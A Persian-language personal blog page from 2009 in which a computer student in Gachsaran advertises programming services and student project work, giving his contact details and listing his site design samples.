___________________________

انجام كليه پروژه های دانشجوی در حداقل زمان ممکن

سفارش برنامه نويسي (دانشجويي ، كاربردي ) پذيرفته مي شود .

پيشرفته ، متوسط ، مقدماتي


آدرس: شهرستان گچساران/ بلوار ولي عصر(خيابان شيراز)/ پاساژ گلستان/كافي نت جگوار

همراه : ۰۹۳۶۶۴۰۲۱۶۸
تلفن : ۲۲۳۰۱۲۱-۰۷۴۲



با کمال تشکر مدیریت گچساران 18 (اسماعیل هاشمی - دانشجوي كامپيوتر دانشگاه آزاد گچساران)


Www.Hashemi64.ir

esmail.hashemi@gmail.com

  لوگوي ما
پرتال تخصصی کامپیوتر    Www.Hashemi64.ir


  نمونه كاري هاي طراحي

پرتال شهداي گچساران

وبلاگ محسن نامجو

دست نوشته هاي آخرين ديوانه

روز نوشته هاي يك دانشجو (سياسي)

ارسال پيغام مستقيم به ايمل مديريت

سفارش برنامه نويسي

.:: تمام پيوند هاي روزانه ::.


  آمار بازديد

نويسندگان :
» اسماعیل هاشمی
» كاربر مهمان

آمار بازديد :

» کاربر: مهمان


با عضويت در خبرنامه از امكانات اين وب و ديگر وب سايت هاي تحت مديريت اينجانب برخوردار مي شويد موارد زير : عــکــسهای داغ روز مطالب سرگرم کننده داغ ترین خبرهای روز دنیا کمیاب ترین کلیپ های موبایل به ایمیل شما ارسال می شوند.





Powered by WebGozar

من در سايت متخصصين ايران



 

صفحه اصلي |  پست الکترونيک |  اضافه به علاقه مندي ها | ذخيره صفحه | طراح قالب

 

Powered By blogfa.com Copyright © 2009 by Esmail hashemi
This Themplate  By گچساران 18